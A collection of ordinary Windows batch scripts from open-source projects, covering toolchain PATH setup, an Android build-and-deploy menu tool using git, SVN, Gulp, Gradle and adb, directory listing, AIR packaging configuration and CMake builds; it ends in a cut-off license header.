@echo [%Time:~0,8%] Adding MinGW toolchains to temporary PATH
@set PATH=%MingwBinPath%;%PATH%
@if exist %MingwBinPath%\make.exe goto wait
:linkmake
@echo [%Time:~0,8%] 'make' not found
@pushd %cd%
@cd /d %MingwBinPath%
@echo [%Time:~0,8%] Linking 'make' to 'mingw32-make'
@mklink /h make.exe mingw32-make.exe > nul
@popd
:wait
@echo [%Time:~0,8%] 'make' found
@cmd /k echo [%Time:~0,8%] Premake done; 'gcc', 'make', etc. is available
| ricyn/misc | 常用算法/二叉树非递归/premake.bat | bat | gpl-3.0 | 603 |
:: Hard Hat [Windows]
:: https://github.com/equiman/hardhatwin
:: GNU GPLv3
@echo off
setlocal enabledelayedexpansion
call refreshenv > nul
:: Version
set appversion=1.8.1
:: Labels
set txt_notdefined=is not defined
set txt_notinstalled=is not installed
:update
call color 06
cls
echo ==========================================================================================
echo UPDATE
echo ==========================================================================================
echo.
echo ==^> Updating...
cd /d %~dp0
copy config.bat config.bkp /y
git checkout config.bat
git pull | findstr /c:"Already up-to-date"
if %errorlevel% == 0 (
copy config.bkp config.bat /y
git update-index --assume-unchanged config.bat
del /f /q config.bkp
goto config
) else (
call color E0
echo.
echo ==========================================================================================
echo.
echo Hard Hat was updated please RESTART to continue.
echo.
echo Refer to CHANGELOG file for details
echo or visit https://github.com/equiman/hardhatwin/
echo.
echo ==========================================================================================
echo.
copy config.bkp config.bat /y
git update-index --assume-unchanged config.bat
del /f /q config.bkp
pause
goto end
)
:config
call %~dp0\config.bat
call color 06
echo.
echo ==^> Verifying...
set count=0
if not defined dir (
set /a count+=1
set "options[!count!]='dir': Development path"
)
if not defined prd (
set /a count+=1
set "options[!count!]='prd': Project folder inside 'dir' path"
)
if not defined src (
set /a count+=1
set "options[!count!]='src': Filter for projects list"
)
if not defined ext (
set /a count+=1
set "options[!count!]='ext': APK extension file"
)
if not defined out (
set /a count+=1
set "options[!count!]='out': APK output path"
)
if not defined glp (
set /a count+=1
set "options[!count!]='glp': Gulp Project"
)
if not defined lcl (
set /a count+=1
set "options[!count!]='lcl': Android Studio files and configuration"
)
if not defined mac (
set /a count+=1
set "options[!count!]='mac': Device Android MAC Address"
)
if not defined netstart (
set /a count+=1
set "options[!count!]='netstart': PC first 1 octets of Ip Address"
)
if !count! equ 0 (
goto menu
) else (
call color 4E
echo.
echo ==========================================================================================
echo.
echo Some configuration are not found or empty:
echo.
for /l %%p in (1,1,!count!) do echo * !options[%%p]!
echo.
echo Please made all needed corrections in config.bat file and RESTART to continue.
echo.
echo Refer to README file on Setup section for details
echo or visit https://github.com/equiman/hardhatwin/
echo.
echo ==========================================================================================
echo.
pause
goto end
)
:menu
:: Local IP Address
for /f "tokens=2 delims=:" %%i in ('"ipconfig | findstr IP | findstr %netstart%."') do set local_ip=%%i
set host=%COMPUTERNAME%
cls
call color F0
echo ====================================================================================================
echo HARD HAT # %appversion% IP:%local_ip% [%host%]
echo ====================================================================================================
if not defined project echo [P] Select Project
if defined project echo [P] Selected Project: '%project%'
if defined project (
if not defined file echo [F] Select File
if defined file echo [F] Selected File: '%file%'
if defined file echo [I] Install [C] Copy [P] Path [S] Signer [V] Values
)
if defined project (
echo.
echo [S] SVN
echo [C] Cleanup [R] Revert [U] Update [D] Delete Unversioned
)
if not exist %glp%/node_modules/ (
echo.
echo [G] Gulp
echo [I] Install
) else (
if defined project (
echo.
echo [G] Gulp
echo [U] Uglify
echo [R] Revert
if not defined gulpconf (
echo [D] Development
) else (
echo [D] Development: '%gulpconf%'
echo [S] Server
)
)
)
if defined project (
echo.
echo [G] Gradle
echo [L] Local Files
if not defined gradleconf (
echo [C] Configuration
) else (
echo [C] Configuration: '%gradleconf%'
echo [B] Build
)
)
echo.
echo [A] Android Debug Bridge
echo [R] Restart Server
echo [L] Device List
if not defined ip echo [W] Wifi Connect
if defined ip echo [D] Wifi Disconnect: '%ip%'
echo.
echo [I] Information [X] Exit
echo ====================================================================================================
echo.
set "startchoice="
set /p startchoice="Make your choice: "
echo.
if "%startchoice%" equ "" (
goto error
)
call color 06
if "%startchoice%"=="X" goto end
if "%startchoice%"=="x" goto end
if "%startchoice%"=="I" goto info
if "%startchoice%"=="i" goto info
if "%startchoice%"=="P" goto project
if "%startchoice%"=="p" goto project
if "%startchoice%"=="PF" goto file
if "%startchoice%"=="pf" goto file
if "%startchoice%"=="PI" goto install
if "%startchoice%"=="pi" goto install
if "%startchoice%"=="PS" goto apksign
if "%startchoice%"=="ps" goto apksign
if "%startchoice%"=="PV" goto apkvalues
if "%startchoice%"=="pv" goto apkvalues
if "%startchoice%"=="PP" goto copypath
if "%startchoice%"=="pp" goto copypath
if "%startchoice%"=="PC" goto duplicate
if "%startchoice%"=="pc" goto duplicate
if "%startchoice%"=="GI" goto gulp
if "%startchoice%"=="gi" goto gulp
if "%startchoice%"=="GU" goto uglify
if "%startchoice%"=="gu" goto uglify
if "%startchoice%"=="GR" goto revert
if "%startchoice%"=="gr" goto revert
if "%startchoice%"=="GD" goto development
if "%startchoice%"=="gd" goto development
if "%startchoice%"=="GS" goto server
if "%startchoice%"=="gs" goto server
if "%startchoice%"=="S" goto vpn
if "%startchoice%"=="s" goto vpn
if "%startchoice%"=="SC" goto vpn
if "%startchoice%"=="sc" goto vpn
if "%startchoice%"=="SR" goto vpn
if "%startchoice%"=="sr" goto vpn
if "%startchoice%"=="SU" goto vpn
if "%startchoice%"=="su" goto vpn
if "%startchoice%"=="SD" goto vpn
if "%startchoice%"=="sd" goto vpn
if "%startchoice%"=="GC" goto debug
if "%startchoice%"=="gc" goto debug
if "%startchoice%"=="GL" goto localfiles
if "%startchoice%"=="gl" goto localfiles
if "%startchoice%"=="GB" goto create
if "%startchoice%"=="gb" goto create
if "%startchoice%"=="AR" goto restart
if "%startchoice%"=="ar" goto restart
if "%startchoice%"=="AL" goto devices
if "%startchoice%"=="al" goto devices
if "%startchoice%"=="AW" goto wifi
if "%startchoice%"=="aw" goto wifi
if "%startchoice%"=="AD" goto disconnect
if "%startchoice%"=="ad" goto disconnect
goto error
:error
cls
call color 4E
echo ==========================================================================================
echo ERROR
echo ==========================================================================================
echo.
echo Incorrect option, please try again.
echo.
if defined mse (
echo %mse%
echo.
)
echo ==========================================================================================
echo.
pause
set "mse="
goto menu
:debug
cls
call color E0
echo ==========================================================================================
echo QUESTION
echo ==========================================================================================
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
echo.
echo Did you remembered change DEBUG to false?
echo.
set "debugchoice="
set /p debugchoice="Make your choice ['Y'ES/'N'o]: "
call color 06
if "!debugchoice!" equ "n" goto menu
if "!debugchoice!" equ "N" goto menu
if "!debugchoice!" equ "y" goto config
if "!debugchoice!" equ "Y" goto config
if "!debugchoice!" equ "" goto config
goto error
echo.
echo ==========================================================================================
echo.
goto menu
)
:vpn
cls
call color E0
echo ==========================================================================================
echo QUESTION
echo ==========================================================================================
echo.
echo Did you remembered CONNECT to VPN?
echo.
set "buildchoice="
set /p buildchoice="Make your choice ['Y'ES/'N'o]: "
call color 06
if "!buildchoice!" equ "n" goto menu
if "!buildchoice!" equ "N" goto menu
if "!buildchoice!" equ "y" goto svn
if "!buildchoice!" equ "Y" goto svn
if "!buildchoice!" equ "" goto svn
goto error
echo.
echo ==========================================================================================
echo.
goto menu
:info
cls
echo ==========================================================================================
echo ENVIRONMENT VARIABLES
echo ==========================================================================================
echo.
set java_p=%txt_notdefined%
if defined JAVA_HOME (
set java_p=%JAVA_HOME%
)
echo JAVA_HOME: '%java_p%'
set android_p=%txt_notdefined%
if defined ANDROID_HOME (
set android_p=%ANDROID_HOME%
)
echo ANDROID_HOME: '%android_p%'
set ndk_p=%txt_notdefined%
if defined ANDROID_NDK_HOME (
set ndk_p=%ANDROID_NDK_HOME%
)
echo ANDROID_NDK_HOME: '%ndk_p%'
set apache_p=%txt_notdefined%
if defined APACHE_HOME (
set apache_p="%APACHE_HOME%"
)
echo APACHE_HOME: '%apache_p:"=%'
set gradle_p=%txt_notdefined%
if defined GRADLE_HOME (
set gradle_p=%GRADLE_HOME%
)
echo GRADLE_HOME: '%gradle_p%'
echo.
echo ==========================================================================================
echo REQUIRED COMMANDS
echo ==========================================================================================
echo.
where java >nul 2>nul
if %ERRORLEVEL% neq 0 (
set java_v=%txt_notinstalled%
) else (
for /f "tokens=3" %%g in ('java -version 2^>^&1 ^| findstr /i "version"') do set java_v=%%g
)
if %ERRORLEVEL% neq 0 (
echo Java: '%java_v%'
) else (
echo Java: '%java_v:~1,8%'
)
where svn >nul 2>nul
if %ERRORLEVEL% neq 0 (
set svn_v=%txt_notinstalled%
) else (
for /f %%i in ('svn --version --quiet') do set svn_v=%%i
)
echo Subversion: '%svn_v%'
where git >nul 2>nul
if %ERRORLEVEL% neq 0 (
set git_v=%txt_notinstalled%
) else (
for /f "tokens=3" %%g in ('git --version 2^>^&1') do set git_v=%%g
)
echo Git: '%git_v%'
where gradle >nul 2>nul
if %ERRORLEVEL% neq 0 (
set gradle_v=%txt_notinstalled%
) else (
for /f "tokens=2" %%g in ('gradle -v 2^>^&1 ^| findstr /i "Gradle"') do set gradle_v=%%g
)
echo Gradle: '%gradle_v%'
echo.
where httpd >nul 2>nul
if %ERRORLEVEL% neq 0 (
set apache_v=%txt_notinstalled%
) else (
for /f "tokens=3" %%g in ('httpd -v 2^>^&1 ^| findstr /i "version"') do set apache_v=%%g
)
if %ERRORLEVEL% neq 0 (
echo Apache: '%apache_v%'
) else (
echo Apache: '%apache_v:~7,10%'
)
where node >nul 2>nul
if %ERRORLEVEL% neq 0 (
set node_v=%txt_notinstalled%
) else (
for /f %%i in ('node -v') do set node_v=%%i
)
if %ERRORLEVEL% neq 0 (
echo Node: '%node_v%'
) else (
echo Node: '%node_v:~1,10%'
)
where npm >nul 2>nul
if %ERRORLEVEL% neq 0 (
set npm_v=%txt_notinstalled%
) else (
for /f %%i in ('npm -v') do set npm_v=%%i
)
echo NPM: '%npm_v%'
where tsc >nul 2>nul
if %ERRORLEVEL% neq 0 (
set typescript_v=%txt_notinstalled%
) else (
for /f "tokens=2" %%g in ('tsc -v 2^>^&1') do set typescript_v=%%g
)
echo TypeScript: '%typescript_v%'
where tns >nul 2>nul
if %ERRORLEVEL% neq 0 (
set nativescript_v=%txt_notinstalled%
) else (
for /f %%i in ('tns --version') do set nativescript_v=%%i
)
echo NativeScript: '%nativescript_v%'
where cordova >nul 2>nul
if %ERRORLEVEL% neq 0 (
set cordova_v=%txt_notinstalled%
) else (
for /f %%i in ('cordova -v') do set cordova_v=%%i
)
echo Cordova: '%cordova_v%'
where gulp >nul 2>nul
if %ERRORLEVEL% neq 0 (
set gulp_v=%txt_notinstalled%
) else (
for /f "tokens=4" %%g in ('gulp --v 2^>^&1') do set gulp_v=%%g
)
echo Gulp: '%gulp_v%'
echo.
echo ==========================================================================================
echo.
pause
goto menu
:project
set "projectchoice="
cls
@echo off
if not exist %dir%\%prd% (
set mse=You need create an %dir%\%prd% folder!
goto error
) else (
cd /d %dir%\%prd%
)
set count=0
for /f "delims=" %%p in ('dir /a:d /b %src%' ) do (
:: Increment %count% here so that it doesn't get incremented later
set /a count+=1
:: Add the file name to the options array
set "options[!count!]=%%p"
)
if !count! equ 0 (
set mse=You need create an %src% folder inside %dir%\%prd%!
goto error
)
cls
echo ==========================================================================================
echo PROJECTS LIST
echo ==========================================================================================
echo.
for /l %%p in (1,1,!count!) do echo %%p. !options[%%p]!
echo.
set "projectchoice="
set /p projectchoice="Enter a Project to load [or EMPTY to cancel]: "
if "!projectchoice!" equ "" (
goto menu
)
if !projectchoice! leq 0 (
goto projecterror
)
if !projectchoice! gtr !count! (
goto projecterror
)
call echo(%%options[!projectchoice!]%%)
set project=!options[%projectchoice%]!
set "file="
:: echo %project%
if not exist %dir%\%prd%\%project%\android\ (
set "project="
set "file="
set mse=There isn't an 'android' folder inside '%project%' folder!
goto error
)
echo.
goto menu
:projecterror
set "project="
set "file="
goto error
:svn
cls
echo ==========================================================================================
echo SVN
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
cd /d %dir%\%prd%\%project%\android\
set _all=0
set _clean=0
set _revert=0
set _update=0
set _delete=0
if "%startchoice%"=="S" set /a _all=1
if "%startchoice%"=="s" set /a _all=1
if !_all! equ 1 (
set /a _clean=1
set /a _revert=1
set /a _update=1
set /a _delete=0
) else (
if "%startchoice%"=="SC" set /a _clean=1
if "%startchoice%"=="sc" set /a _clean=1
if "%startchoice%"=="SR" set /a _revert=1
if "%startchoice%"=="sr" set /a _revert=1
if "%startchoice%"=="SU" set /a _update=1
if "%startchoice%"=="su" set /a _update=1
if "%startchoice%"=="SD" set /a _delete=1
if "%startchoice%"=="sd" set /a _delete=1
)
if !_clean! equ 1 (
echo ==^> Cleaning ...
call svn cleanup
)
if !_revert! equ 1 (
echo ==^> Reverting ...
call svn revert --depth=infinity .
)
if !_update! equ 1 (
echo ==^> Updating ...
call svn update .
)
if !_delete! equ 1 (
echo ==^> Deleting ...
call svn cleanup . --remove-unversioned
)
)
call color 06
echo.
echo ==========================================================================================
echo.
pause
goto menu
:gulp
cls
echo ==========================================================================================
echo INSTALL GULP
echo ==========================================================================================
echo.
if not exist %glp%\www mkdir %glp%\www
if not exist %glp%\bkp mkdir %glp%\bkp
cd /d %glp%\
echo ==^> Installing Gulp ...
if exist %glp%\package.json (
call npm install
) else (
set mse=File package.json is Missing on Gulp Path
goto error
)
call color 06
echo.
echo ==========================================================================================
echo.
pause
goto menu
:uglify
cls
echo ==========================================================================================
echo GULP UGLIFY
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
echo ==^> Cleaning Files ...
if exist %glp%\bld rmdir %glp%\bld /s/q
del %glp%\www\*.* /s/q
del %glp%\bkp\*.* /s/q
echo.
echo ==^> Copying Files ...
xcopy /e/y %dir%\%prd%\%project%\android\assets\www %glp%\www
xcopy /e/y %dir%\%prd%\%project%\android\assets\www %glp%\bkp
echo.
echo ==^> Gulp Uglify ...
cd /d %glp%\
call gulp build
echo.
set "goodchoice="
set /p goodchoice="Was there a problem uglifying? ['Y'es/'N'O]: "
if "!goodchoice!" equ "y" goto revert
if "!goodchoice!" equ "Y" goto revert
set "goodchoice="
call color 06
echo.
echo ==^> Copying Ugly Files ...
xcopy /e/y %glp%\bld %dir%\%prd%\%project%\android\assets\www
goto uglifyfinish
)
:uglifyfinish
echo.
echo ==========================================================================================
echo.
pause
goto menu
:development
cls
echo ==========================================================================================
echo GULP SERVER CONFIG
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
set "gdmnchoice="
set "_gdmnchoice="
set /p gdmnchoice="[Dimension]: "
echo.
set "gflvchoice="
set "_gflvchoice="
set /p gflvchoice="['A'lfa/'B'eta/'S'tag/'P'rod] or [EMPTY to default]: "
if "!gflvchoice!" equ "a" (
set gflvchoice= --flv A
set _gflvchoice=Alfa
)
if "!gflvchoice!" equ "A" (
set gflvchoice= --flv A
set _gflvchoice=Alfa
)
if "!gflvchoice!" equ "b" (
set gflvchoice= --flv B
set _gflvchoice=Beta
)
if "!gflvchoice!" equ "B" (
set gflvchoice= --flv B
set _gflvchoice=Beta
)
if "!gflvchoice!" equ "s" (
set gflvchoice= --flv S
set _gflvchoice=Stag
)
if "!gflvchoice!" equ "S" (
set gflvchoice= --flv S
set _gflvchoice=Stag
)
if "!gflvchoice!" equ "p" (
set gflvchoice= --flv P
set _gflvchoice=Prod
)
if "!gflvchoice!" equ "P" (
set gflvchoice= --flv P
set _gflvchoice=Prod
)
echo.
set "gsrvchoice="
set "_gsrvchoice="
set /p gsrvchoice="[Server Number] or [EMPTY to default]: "
set _gsrvchoice=!gsrvchoice!
if "!gsrvchoice!" neq "" set gsrvchoice= --srv !gsrvchoice!
echo.
set "gsynchoice="
set "_gsynchoice="
set /p gsynchoice="Active Sync ['Y'es/'N'O] or [EMPTY to default]: "
if "!gsynchoice!" equ "y" (
set gsynchoice= --sync true
set _gsynchoice=+Sync
)
if "!gsynchoice!" equ "Y" (
set gsynchoice= --sync true
set _gsynchoice=+Sync
)
if "!gsynchoice!" equ "n" (
set "gsrvchoice="
set "_gsrvchoice="
)
if "!gsynchoice!" equ "N" (
set "gsrvchoice="
set "_gsrvchoice="
)
set "gulpconf="
set gulpconf=!gdmnchoice!!_gflvchoice!!_gsrvchoice!!_gsynchoice!
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:server
cls
echo ==========================================================================================
echo GULP SERVER START
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined gdmnchoice (
set mse=You need define Gulp Browser Dimension first!
goto error
)
if defined project (
cd /d %glp%\
start cmd /K gulp --pth %dir%\%prd%\%project%\ --dmn !gdmnchoice!!gflvchoice!!gsrvchoice!!gsynchoice! --host%local_ip%
)
echo.
echo ==========================================================================================
echo.
goto menu
:revert
cls
echo ==========================================================================================
echo REVERT ORIGINAL FILES
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
echo ==^> Restoring Files ...
xcopy /e/y %glp%\bkp %dir%\%prd%\%project%\android\assets\www
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:file
set "filechoice="
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
cls
@echo off
cd /d %dir%\%prd%\%project%\android\
if not exist %dir%\%prd%\%project%\android\%out% (
set mse=You need create an APK first!
goto error
) else (
cd /d %dir%\%prd%\%project%\android\%out%
)
set count=0
for /f "delims=" %%f in ('dir /a:a /b %ext% ^| find /v "unaligned" ') do (
:: Increment %count% here so that it doesn't get incremented later
set /a count+=1
:: Add the file name to the options array
set "options[!count!]=%%f"
)
if !count! equ 0 (
set mse=You need create an APK first!
goto error
)
cls
echo ==========================================================================================
echo APK FILE LIST
echo ==========================================================================================
echo.
for /l %%f in (1,1,!count!) do echo %%f. !options[%%f]!
echo.
set "filechoice="
set /p filechoice="Select an APK file [or EMPTY to cancel]: "
if "!filechoice!" equ "" (
goto menu
)
if !filechoice! leq 0 (
goto fileerror
)
if !filechoice! gtr !count! (
goto fileerror
)
call echo(%%options[!filechoice!]%%)
set file=!options[%filechoice%]!
set filepath=%dir%\%prd%\%project%\android\%out%\%file%
:: echo %file%
echo.
goto menu
:fileerror
set "file="
set "filepath="
goto error
)
:install
cls
echo ==========================================================================================
echo INSTALL APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined file (
set mse=You need select an APK first!
goto error
)
if defined project if defined file (
adb devices | findstr "\<device\>" >nul
echo errorlevel
if errorlevel 1 (
set mse=no devices/emulators found!
goto error
) else (
echo ==^> Installing %project% on device ...
echo APK file %file%
call adb install -r %filepath%
)
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:apksign
cls
echo ==========================================================================================
echo SIGNER VERIFY APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined file (
set mse=You need select an APK first!
goto error
)
echo ==^> Verifying ...
echo APK file %file%
call apksigner verify --print-certs %filepath%
echo.
echo ==========================================================================================
echo.
pause
goto menu
:apkvalues
cls
echo ==========================================================================================
echo INFORMATION VALUES APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined file (
set mse=You need select an APK first!
goto error
)
echo ==^> Badging ...
echo APK file %file%
call aapt dump badging %filepath%
echo.
echo ==========================================================================================
echo.
pause
goto menu
:copypath
cls
echo ==========================================================================================
echo CLIPBOARD APK PATH
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined file (
set mse=You need select an APK first!
goto error
)
if defined project if defined file (
echo %file%
echo %filepath% | clip
echo Path has been copied to clipboard
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:duplicate
cls
echo ==========================================================================================
echo DUPLICATE APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined file (
set mse=You need select an APK first!
goto error
)
if defined project if defined file (
echo Current file: %file%
echo.
set "namechoice="
set /p namechoice="Select an APK name [or EMPTY to cancel]: "
if "!namechoice!" equ "" (
goto menu
)
echo.
echo ==^> Duplicating on !namechoice!.apk ...
copy /y %dir%\%prd%\%project%\android\%out%\%file% %dir%\%prd%\%project%\android\%out%\!namechoice!.apk
echo.
set "newfilechoice="
set /p newfilechoice="Do you want to select this new file ['Y'ES/'N'o]: "
call color 06
set _nop=0
if "!newfilechoice!" equ "n" set /a _nop=1
if "!newfilechoice!" equ "N" set /a _nop=1
if "!newfilechoice!" equ "y" set /a _nop=2
if "!newfilechoice!" equ "Y" set /a _nop=2
if "!newfilechoice!" equ "" set /a _nop=2
if !_nop! equ 0 goto error
if !_nop! equ 0 goto menu
if !_nop! equ 2 (
set file=!namechoice!.apk
set filepath=%dir%\%prd%\%project%\android\%out%\%file%
goto menu
)
)
echo ==========================================================================================
echo.
pause
goto menu
:config
cls
echo ==========================================================================================
echo CONFIG APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
set _conf=0
if "%startchoice%"=="GC" set /a _conf=1
if "%startchoice%"=="gc" set /a _conf=1
if !_conf! equ 1 (
set "buildchoice="
set /p buildchoice="Make your choice ['D'EBUG/'R'elease]: "
if "!buildchoice!" equ "D" set buildchoice=Debug
if "!buildchoice!" equ "d" set buildchoice=Debug
if "!buildchoice!" equ "R" set buildchoice=Release
if "!buildchoice!" equ "r" set buildchoice=Release
if "!buildchoice!" equ "" set buildchoice=Debug
echo.
set "flavorchoice="
set /p flavorchoice="['A'lfa/'B'eta/'S'tag/'P'rod] or [EMPTY to none]: "
if "!flavorchoice!" equ "a" set flavorchoice=Alfa
if "!flavorchoice!" equ "A" set flavorchoice=Alfa
if "!flavorchoice!" equ "b" set flavorchoice=Beta
if "!flavorchoice!" equ "B" set flavorchoice=Beta
if "!flavorchoice!" equ "s" set flavorchoice=Stag
if "!flavorchoice!" equ "S" set flavorchoice=Stag
if "!flavorchoice!" equ "p" set flavorchoice=Prod
if "!flavorchoice!" equ "P" set flavorchoice=Prod
set "dimensionchoice="
set /p dimensionchoice="[Dimension] or [EMPTY to none]: "
set "gradleconf="
set gradleconf=!dimensionchoice!!flavorchoice!!buildchoice!
)
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:localfiles
cls
echo ==========================================================================================
echo COPY LOCAL FILES
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if defined project (
call color 06
cd /d %dir%\%prd%\%project%\android\
echo.
echo ==^> Copying local SDK paths ...
copy %lcl%\local.properties local.properties
echo ==^> Copying Keystores ...
xcopy /i/e/y %lcl%\keystore keystore
echo ==^> Copying Gradle properties ...
copy %lcl%\gradle.properties gradle.properties
echo.
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:create
cls
echo ==========================================================================================
echo BUILD APK
echo ==========================================================================================
echo.
if not defined project (
set mse=You need select a project first!
goto error
)
if not defined gradleconf (
set mse=You need select a gradle configuration first!
goto error
)
if defined project (
set _build=0
if "%startchoice%"=="GB" set /a _build=1
if "%startchoice%"=="gb" set /a _build=1
if !_build! equ 1 (
call color 06
cd /d %dir%\%prd%\%project%\android\
echo.
echo ==^> Cleaning Path ...
call gradlew clean
echo.
echo ==^> Building Gradle APK ...
call gradlew assemble!gradleconf!
set "file="
)
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:restart
cls
echo ==========================================================================================
echo RESTART ADB
echo ==========================================================================================
echo.
if defined ip (
echo ==^> Disconnecting devices ...
call adb disconnect %ip%
set "ip="
:: Flush Arp Cache (Admin)
echo Flush the entire connected devices cache
call netsh interface ip delete arpcache >nul
)
echo ==^> killing ADB server ...
call adb kill-server
echo ==^> starting ADB server ...
call adb start-server
echo.
echo ==========================================================================================
echo.
pause
goto menu
:devices
cls
echo ==========================================================================================
echo DEVICES LIST
echo ==========================================================================================
echo.
call adb devices
echo.
echo ==========================================================================================
echo.
pause
goto menu
:wifi
cls
echo ==========================================================================================
echo CONNECT DEVICE
echo ==========================================================================================
echo.
set "ip="
set /a ktw=0
:: Search Wifi Network
for /f "delims=" %%a in ('netsh wlan show interface ^| findstr /r "^....SSID" ') do set "wnt=%%a"
if errorlevel 1 (
echo WiFi not available!
call color 04
goto ipfinish
) else (
if "!wnt!" neq "" (
set "ntw="
for /f %%i in ('echo.%wnt% ^| find "!netname[1]!"') do set "ntw=!netadrs[1]!"
for /f %%i in ('echo.%wnt% ^| find "!netname[2]!"') do set "ntw=!netadrs[2]!"
for /f %%i in ('echo.%wnt% ^| find "!netname[3]!"') do set "ntw=!netadrs[3]!"
for /f %%i in ('echo.%wnt% ^| find "!netname[4]!"') do set "ntw=!netadrs[4]!"
if not defined ntw (
goto ask
)
if defined ntw (
goto ipaddress
)
)
if "!wnt!" equ "" (
echo WiFi Network not available!
call color 04
goto ipfinish
)
)
:ipaddress
:: get IP Address
for /f %%i in ('call arp -a ^| findstr "%mac%"') do set ip=%%i
if not defined ip (
set /a ktw=%ktw%+1
if %ktw%==1 goto ask
echo Discovering network... %ntw%XXX
:: Ping all IPs from %ntw% 1 to 254
for /l %%n in (1,1,254) do start /b ping -n 1 -w %%ntw%%n>nul
timeout 1 >nul
goto ipaddress
)
:ask
if not defined ip (
set "oct="
if %ktw%==1 echo You need connect your device first!
echo Mac Address: %mac%
echo Network: %ntw%
echo.
set /p oct=" Enter last octets [or EMPTY to cancel]: "
if "!oct!" equ "" (
goto menu
)
if "!oct!" neq "" (
set ip=!ntw!!oct!
)
)
if defined ip (
echo.
echo IP Address: !ip!
ping -n 1 %ip% | find "TTL=" > nul
if errorlevel 1 (
set "ip="
echo.
echo Host not recheable!
call color 04
) else (
echo.
call adb connect %ip%
)
goto ipfinish
)
:ipfinish
echo.
echo ==========================================================================================
echo.
pause
goto menu
:disconnect
cls
echo ==========================================================================================
echo DISCONNECT DEVICE
echo ==========================================================================================
echo.
if not defined ip (
echo You need make Wifi connect first!
call color 04
)
if defined ip (
call adb disconnect %ip%
set "ip="
)
echo.
echo ==========================================================================================
echo.
pause
goto menu
:end
cls
call color 07
exit /b
| equiman/hardhatwin | tools.bat | bat | gpl-3.0 | 33,033 |
@REM Copyright 2012 Andrew Gottemoller.
@REM
@REM This software is a copyrighted work licensed under the terms of the
@REM Secure Rsync license. Please consult the file "SR_LICENSE" for
@REM details.
@echo off
setlocal enabledelayedexpansion
if not exist %1 exit/B 0
pushd %1
if not exist %2 mkdir %2
set dir_list_file=%2\_backup_dir_list.txt
dir /s /b /AD 2>NUL 1>%dir_list_file%
for /F "delims=" %%i in (%dir_list_file%) do (
set found_item=%%~i
set found_item=!found_item:%CD%\=!
set found_item=!found_item: =?!
set found_item=!found_item:\=/!
echo !found_item!
)
del /F /Q %dir_list_file%
popd
exit /B 0
| agottem/secure_rsync | secure_rsync/shell/cmd/build_directory_list.bat | bat | gpl-3.0 | 641 |
:user_configuration
:: About AIR application packaging
:: http://livedocs.adobe.com/flex/3/html/help.html?content=CommandLineTools_5.html#1035959
:: http://livedocs.adobe.com/flex/3/html/distributing_apps_4.html#1037515
:: NOTICE: all paths are relative to project root
:: Your certificate information
set CERT_NAME="Test"
set CERT_PASS=fd
set CERT_FILE="bat\Test.p12"
set SIGNING_OPTIONS=-storetype pkcs12 -keystore %CERT_FILE% -storepass %CERT_PASS%
:: Application descriptor
set APP_XML=application.xml
:: Files to package
set APP_DIR=bin
set FILE_OR_DIR=-C %APP_DIR% .
:: Your application ID (must match <id> of Application descriptor)
set APP_ID=Test
:: Output
set AIR_PATH=air
set AIR_NAME=Test
:validation
%SystemRoot%\System32\find /C "<id>%APP_ID%</id>" "%APP_XML%" > NUL
if errorlevel 1 goto badid
goto end
:badid
echo.
echo ERROR:
echo Application ID in 'bat\SetupApplication.bat' (APP_ID)
echo does NOT match Application descriptor '%APP_XML%' (id)
echo.
if %PAUSE_ERRORS%==1 pause
exit
:end | Ohmnivore/HeadRush | Server/bat/SetupApplication.bat | bat | gpl-3.0 | 1,020 |
C:\Python37-32\python.exe interfaces\file_system\filelister.py | acutesoftware/lifepim | src/run_filelist.bat | bat | gpl-3.0 | 62 |
@ECHO OFF
REM userhome - JSTOR/Harvard Object Validation Environment
REM Copyright 2004-2006 by the President and Fellows of Harvard College
REM JHOVE is made available under the GNU General Public License (see the
REM file LICENSE for details)
REM
REM Driver script to display the default Java user.home property
REM
REM Usage: userhome
REM
REM Configuration constants:
REM JHOVE_HOME Jhove installation directory
REM JAVA_HOME Java JRE directory
REM JAVA Java interpreter
REM EXTRA_JARS Extra jar files to add to CLASSPATH
SET JHOVE_HOME="C:\Program Files\jhove"
SET JAVA_HOME="C:\Program Files\java\j2re1.4.2_07"
SET JAVA=%JAVA_HOME%\bin\java
REM NOTE: Nothing below this line should be edited
REM #########################################################################
REM Set the CLASSPATH and invoke the Java loader
%JAVA% -classpath %JHOVE_HOME%\classes UserHome
| blekinge/jhove-pdf-a | userhome.bat | bat | lgpl-2.1 | 909 |
:: https://github.com/microsoft/vcpkg/blob/master/docs/specifications/manifests.md
:: vcpkg install glog:x86-windows
mkdir build-x86-windows & pushd build-x86-windows
cmake .. -DCMAKE_TOOLCHAIN_FILE="%VCPKG_ROOT%\scripts\buildsystems\vcpkg.cmake" -DVCPKG_TARGET_TRIPLET=x86-windows -DCMAKE_GENERATOR_PLATFORM=Win32
popd
cmake --build build-x86-windows --config Release
build-x86-windows\Release\hello_glog.exe
pause
| myd7349/Ongoing-Study | cpp/Google/glog/hello_glog/build-x86-windows.bat | bat | lgpl-3.0 | 416 |
@rem Copyright (c) 2014 The Chromium Authors. All rights reserved.
@rem Use of this source code is governed by a BSD-style license that can be
